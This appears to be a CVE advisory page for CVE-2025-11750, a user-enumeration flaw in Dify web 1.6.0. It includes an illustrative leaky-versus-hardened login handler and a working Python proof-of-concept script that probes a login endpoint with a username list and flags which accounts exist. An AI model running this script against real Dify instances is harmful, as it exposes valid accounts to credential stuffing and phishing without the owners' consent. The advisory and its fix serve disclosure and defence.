Security Vulnerability Report
CVE-2025-11750 CVSS 5.3 MEDIUM

CVE-2025-11750

Published: 2025-10-22 14:15:49
Last Modified: 2025-10-30 17:46:46

Description

In langgenius/dify-web version 1.6.0, the authentication mechanism reveals the existence of user accounts by returning different error messages for non-existent and existing accounts. Specifically, when a login or registration attempt is made with a non-existent username or email, the system responds with a message such as "account not found." Conversely, when the username or email exists but the password is incorrect, a different error message is returned. This discrepancy allows an attacker to enumerate valid user accounts by analyzing the error responses, potentially facilitating targeted social engineering, brute force, or credential stuffing attacks.
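As an added illustration of the flaw the advisory describes (example code written here, not Dify's own authentication code), the leaky pattern sits beside a hardened handler that returns one status and one message for both failure cases and always computes a password hash so response time does not separate them either. The user store, salts and credentials are constructed sample data.

```python
import hashlib
import hmac
import os

# Constructed sample user store (not real Dify accounts): email -> (salt, hash).
def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)

_SALT = os.urandom(16)
USERS = {"alice@example.com": (_SALT, _hash("correct horse", _SALT))}

# Dummy credential so an unknown account still pays the hashing cost.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash("not-a-real-password", _DUMMY_SALT)

GENERIC_ERROR = "invalid email or password"


def login_leaky(email: str, password: str) -> tuple[int, str]:
    """The pattern the advisory describes: a different status and message
    for an unknown account than for a known account with a bad password."""
    rec = USERS.get(email)
    if rec is None:
        return 404, "account not found"
    salt, stored = rec
    if not hmac.compare_digest(_hash(password, salt), stored):
        return 401, "incorrect password"
    return 200, "login ok"


def login_hardened(email: str, password: str) -> tuple[int, str]:
    """One response for both failure cases; the hash is computed on every
    path, and an unknown account can never authenticate via the dummy."""
    known = email in USERS
    salt, stored = USERS.get(email, (_DUMMY_SALT, _DUMMY_HASH))
    ok = hmac.compare_digest(_hash(password, salt), stored)
    if not (known and ok):
        return 401, GENERIC_ERROR
    return 200, "login ok"


def responses_distinguishable(login) -> bool:
    """Verify a handler the way this finding would be checked: compare the
    unknown-account response with the known-account, wrong-password one."""
    unknown = login("nobody@example.com", "wrong")
    wrong_pw = login("alice@example.com", "wrong")
    return unknown != wrong_pw
```

The same comparison is a cheap regression check to keep in an application's test suite so the two failure paths cannot drift apart again.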

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:langgenius:dify:1.6.0:*:*:*:*:node.js:*:* - VULNERABLE
langgenius/dify-web 1.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-11750 - Dify Web User Enumeration PoC
# This script demonstrates how to enumerate valid user accounts
# by analyzing different error messages returned by the authentication endpoint.
import requests
import sys

TARGET_URL = "https://target-dify-instance.com/console/api/login"
USERNAME_LIST = ["admin", "test", "user1", "[email protected]"]


def check_account_enumeration(target_url, username):
    """
    Send a login request and analyze the response to determine
    if the account exists based on error message differences.
    """
    payload = {
        "email": username,
        "password": "InvalidPassword123!@#"
    }
    try:
        response = requests.post(target_url, json=payload, timeout=10)
        response_data = response.json()

        # Analyze response message to determine account existence
        error_message = str(response_data).lower()

        if ("account not found" in error_message
                or "user not found" in error_message
                or "邮箱或密码错误" in error_message):
            # Non-existent account indicator
            if "not found" in error_message and "password" not in error_message:
                return False, "Account does not exist"

        if ("incorrect password" in error_message
                or "密码错误" in error_message
                or "invalid password" in error_message):
            # Existing account with wrong password
            return True, "Account EXISTS (wrong password response)"

        # Fallback: check status code and message content
        if response.status_code == 401 or response.status_code == 403:
            return None, f"Auth failed: {response_data}"

        return None, f"Unknown response: {response_data}"
    except Exception as e:
        return None, f"Request error: {str(e)}"


def main():
    print("[*] CVE-2025-11750 - Dify Web User Enumeration PoC")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Testing {len(USERNAME_LIST)} usernames...\n")

    valid_accounts = []
    for username in USERNAME_LIST:
        exists, message = check_account_enumeration(TARGET_URL, username)
        if exists:
            status = "[+] EXISTS"
        elif exists is False:
            status = "[-] NOT FOUND"
        else:
            status = "[?] UNKNOWN"
        print(f"{status} | {username} | {message}")
        if exists:
            valid_accounts.append(username)

    print(f"\n[*] Enumeration complete. Found {len(valid_accounts)} valid account(s).")
    for acc in valid_accounts:
        print(f" -> {acc}")


if __name__ == "__main__":
    main()

References

https://huntr.com/bounties/e7359f9f-c004-4304-9de9-753622d370a1 (Exploit, Third Party Advisory)
